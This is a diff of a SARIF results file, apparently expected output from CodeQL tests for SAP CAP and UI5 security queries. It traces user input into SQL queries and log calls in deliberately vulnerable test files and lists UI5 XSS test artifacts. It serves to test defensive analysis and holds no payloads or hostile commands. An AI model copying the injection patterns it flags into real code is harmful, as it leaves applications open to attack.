"uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 17, - "endColumn" : 63 - } - }, - "message" : { - "text" : "CQL`SEL ... 
+ book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 11, - "endColumn" : 63 - } - }, - "message" : { - "text" : "cqn" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "cqn" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", 
- "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 56, - "endColumn" : 60 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 32, - "endColumn" : 60 - } - }, - "message" : { - "text" : "`SELECT ... + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 18, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cds.par ... 
+ book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 11, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cqn1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - }, - "message" : { - "text" : "cqn1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "eae426bf8fad0192:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } }, { - "ruleId" : 
"js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e05b39891dddd161:1", - "primaryLocationStartColumnFingerprint" : "40" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 20 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 25 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - 
"index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 13, - "endColumn" : 25 - } - }, - "message" : { - "text" : "$" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - }, - "message" : { - "text" : "$" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - 
"text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - 
"text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "{ messageToPass }" - } 
